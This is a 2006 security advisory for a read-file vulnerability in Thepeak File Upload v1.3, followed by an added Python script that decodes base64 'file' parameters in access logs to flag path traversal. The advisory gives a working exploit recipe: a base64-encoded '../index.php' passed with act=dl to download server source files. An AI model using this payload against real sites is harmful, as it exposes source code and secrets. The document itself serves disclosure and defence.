
| Subject: | Thepeak File Upload v1.3 : Read file vulnerability |
|---|---|
| Date: | 26 Oct 2006 01:23:19 -0000 |

Thepeak File Upload v1.3 : Read file vulnerability

Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com

-------------------------
Description:

file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 : http://www.securityfocus.com/archive/1/378494

Today, I found a bug in Thepeak File Upload v1.3. This bug allows an attacker to download source files (.php, ...) from the server.

-------------------------
Exploit :

http://somesite.com/example/index.php --> upload form

Now, we upload one file to the server, ex : test.jpg --> ok

We have its url to view it :
http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=

and the url to download it :
http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=

Notice that the value "dGVzdC5qcGc=" of parameter file is the base64 encoding of "test.jpg".

We need to get the source file http://somesite.com/index.php.

Base64-encode the path to index.php above : ../index.php --> Li4vaW5kZXgucGhw

==> we have the link to download the source file index.php (notice act=dl)
http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files. Have fun!
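
A defender-side check for the request pattern described in the post, as an added example that is not part of the original advisory or of the application's code: because the `file` value is base64, a plain search of access logs for `../` finds nothing, so the value has to be decoded before it is inspected. The request lines are constructed, `classify` is a hypothetical name, and the code assumes legitimate values decode to relative paths inside the upload directory.

```python
import base64
import binascii
import posixpath
from urllib.parse import parse_qs, urlsplit

# Constructed request lines (not from the original post), modelled on its URLs.
SAMPLE_REQUESTS = [
    "GET /example/index.php?act=view&file=dGVzdC5qcGc= HTTP/1.0",
    "GET /example/index.php?act=dl&file=Li4vaW5kZXgucGhw HTTP/1.0",
    "GET /example/index.php?act=dl&file=%%%notbase64 HTTP/1.0",
    "GET /example/index.php?act=list HTTP/1.0",
]


def classify(request_line):
    """Return (verdict, decoded_name) for one HTTP request line."""
    parts = request_line.split()
    query = parse_qs(urlsplit(parts[1]).query) if len(parts) > 1 else {}
    if "file" not in query:
        return ("no-file-param", None)
    raw = query["file"][0].replace(" ", "+")  # parse_qs turns '+' into a space
    raw += "=" * (-len(raw) % 4)              # tolerate stripped padding
    try:
        name = base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return ("undecodable", None)
    # Assumption: legitimate values are relative paths inside the upload dir.
    norm = posixpath.normpath(name.replace("\\", "/"))
    if "\x00" in name or norm.startswith("/") or norm == ".." or norm.startswith("../"):
        return ("traversal", name)
    return ("ok", name)


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line), line)
```

The same decode-then-normalize test belongs in the application before it opens the file; log review only shows requests that were already served.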